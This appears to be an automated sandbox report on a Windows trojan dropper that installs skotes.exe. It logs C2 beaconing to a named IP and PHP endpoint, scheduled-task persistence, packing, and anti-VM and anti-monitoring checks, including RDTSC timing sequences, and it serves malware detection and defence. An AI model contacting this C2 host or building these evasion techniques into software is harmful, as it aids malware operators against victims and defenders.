Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_009DBE30 Sleep,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile, 6_2_009DBE30
Source: unknown HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: skotes.exe, 00000006.00000002.3400789012.000000000138D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000006.00000002.3400789012.000000000138D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php%
Source: skotes.exe, 00000006.00000002.3400789012.0000000001378000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php-?#
Source: skotes.exe, 00000006.00000002.3400789012.000000000138D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php3
Source: skotes.exe, 00000006.00000002.3400789012.000000000138D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php40f1-ac21-573d1d5ce43fLMEMp
Source: skotes.exe, 00000006.00000002.3400789012.000000000138D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php?
Source: skotes.exe, 00000006.00000002.3400789012.000000000138D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpG
Source: skotes.exe, 00000006.00000002.3400789012.000000000138D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpS
Source: skotes.exe, 00000006.00000002.3400789012.000000000138D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php_
Source: skotes.exe, 00000006.00000002.3400789012.000000000138D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpbc1985
Source: skotes.exe, 00000006.00000002.3400789012.000000000138D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpcoded
Source: skotes.exe, 00000006.00000002.3400789012.000000000138D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpded
Source: skotes.exe, 00000006.00000002.3400789012.000000000138D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpk
Source: skotes.exe, 00000006.00000002.3400789012.000000000138D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded
Source: skotes.exe, 00000006.00000002.3400789012.000000000138D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpqYo30zpOYVp
Source: skotes.exe, 00000006.00000002.3400789012.00000000013BF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpqe
Source: skotes.exe, 00000006.00000002.3400789012.000000000138D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpsoft

System Summary
barindex
PE file contains section with special chars
Source: FQSn6sSfgS.exe Static PE information: section name:
Source: FQSn6sSfgS.exe Static PE information: section name: .idata
Source: FQSn6sSfgS.exe Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Creates files inside the system directory
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00A178BB 6_2_00A178BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00A18860 6_2_00A18860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00A17049 6_2_00A17049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00A131A8 6_2_00A131A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_009D4DE0 6_2_009D4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_009DE530 6_2_009DE530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00A12D10 6_2_00A12D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00A1779B 6_2_00A1779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00A07F36 6_2_00A07F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_009D4B30 6_2_009D4B30
Uses 32bit PE files
Source: FQSn6sSfgS.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: FQSn6sSfgS.exe Static PE information: Section: cyzefahx ZLIB complexity 0.994040241570113
Source: skotes.exe.0.dr Static PE information: Section: cyzefahx ZLIB complexity 0.994040241570113
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@5/3@0/1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985 Jump to behavior
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: FQSn6sSfgS.exe Virustotal: Detection: 48%
Source: FQSn6sSfgS.exe ReversingLabs: Detection: 57%
Source: FQSn6sSfgS.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe File read: C:\Users\user\Desktop\FQSn6sSfgS.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\FQSn6sSfgS.exe "C:\Users\user\Desktop\FQSn6sSfgS.exe"
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: FQSn6sSfgS.exe Static file information: File size 2165248 > 1048576
Source: FQSn6sSfgS.exe Static PE information: Raw size of cyzefahx is bigger than: 0x100000 < 0x1a4c00

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Unpacked PE file: 0.2.FQSn6sSfgS.exe.e00000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cyzefahx:EW;fhvyawnr:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;cyzefahx:EW;fhvyawnr:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 2.2.skotes.exe.9d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cyzefahx:EW;fhvyawnr:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;cyzefahx:EW;fhvyawnr:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 3.2.skotes.exe.9d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cyzefahx:EW;fhvyawnr:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;cyzefahx:EW;fhvyawnr:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 6.2.skotes.exe.9d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cyzefahx:EW;fhvyawnr:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;cyzefahx:EW;fhvyawnr:EW;.taggant:EW;
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: skotes.exe.0.dr Static PE information: real checksum: 0x21cc52 should be: 0x21543c
Source: FQSn6sSfgS.exe Static PE information: real checksum: 0x21cc52 should be: 0x21543c
PE file contains sections with non-standard names
Source: FQSn6sSfgS.exe Static PE information: section name:
Source: FQSn6sSfgS.exe Static PE information: section name: .idata
Source: FQSn6sSfgS.exe Static PE information: section name:
Source: FQSn6sSfgS.exe Static PE information: section name: cyzefahx
Source: FQSn6sSfgS.exe Static PE information: section name: fhvyawnr
Source: FQSn6sSfgS.exe Static PE information: section name: .taggant
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: cyzefahx
Source: skotes.exe.0.dr Static PE information: section name: fhvyawnr
Source: skotes.exe.0.dr Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_009ED91C push ecx; ret 6_2_009ED92F
Source: FQSn6sSfgS.exe Static PE information: section name: entropy: 7.025630492302739
Source: FQSn6sSfgS.exe Static PE information: section name: cyzefahx entropy: 7.952113015477968
Source: skotes.exe.0.dr Static PE information: section name: entropy: 7.025630492302739
Source: skotes.exe.0.dr Static PE information: section name: cyzefahx entropy: 7.952113015477968
Drops PE files
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Creates job files (autostart)
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: E6F3A5 second address: E6F3AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: FDDA7D second address: FDDA81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: FDDA81 second address: FDDA8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: FDDA8C second address: FDDAAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB19901BDE4h 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: FDDAAB second address: FDDAAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: FDDAAF second address: FDDAD7 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB19901BDD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c jno 00007FB19901BDE7h 0x00000012 push ecx 0x00000013 push edx 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: FE79E7 second address: FE79F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: FE79F0 second address: FE79FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FB19901BDD6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: FE7B5C second address: FE7B7B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FB19901BD13h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: FE7B7B second address: FE7B7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: FE7CD5 second address: FE7CDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: FE7E75 second address: FE7E89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BDDEh 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: FE8165 second address: FE816B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: FEB1CF second address: FEB1D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
